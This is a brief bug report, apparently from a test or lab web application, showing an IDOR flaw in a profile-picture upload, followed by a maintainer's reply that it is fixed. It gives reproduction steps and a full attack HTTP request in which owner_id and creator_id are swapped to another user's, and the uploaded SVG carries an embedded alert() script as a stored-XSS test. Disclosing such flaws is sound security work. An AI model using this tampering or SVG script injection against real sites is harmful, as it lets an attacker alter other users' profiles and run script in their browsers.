IDOR on profile pic upload

[jeremybuis]

Steps to reproduce:

1. Login as a normal user
2. Update your profile picture with any picture
3. Capture the request using an intercepting proxy
4. Resend the request after changing the creator_id and owner_id to that of another user
5. Navigate to the other users wall and view the upload image

Attack Request:

POST /image HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: multipart/form-data; boundary=--------207487880
Content-Length: 884
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363

----------207487880
Content-Disposition: form-data; name="file"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>
----------207487880
Content-Disposition: form-data; name="owner_id"

486
----------207487880
Content-Disposition: form-data; name="creator_id"

486
----------207487880
Content-Disposition: form-data; name="context"

profile
----------207487880
Content-Disposition: form-data; name="label"

Test Picture
----------207487880--

Attack Response:

HTTP/1.1 302 
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 13:49:46 GMT
Connection: close

[Jarusk]

Fixed in Dev branch. Will validate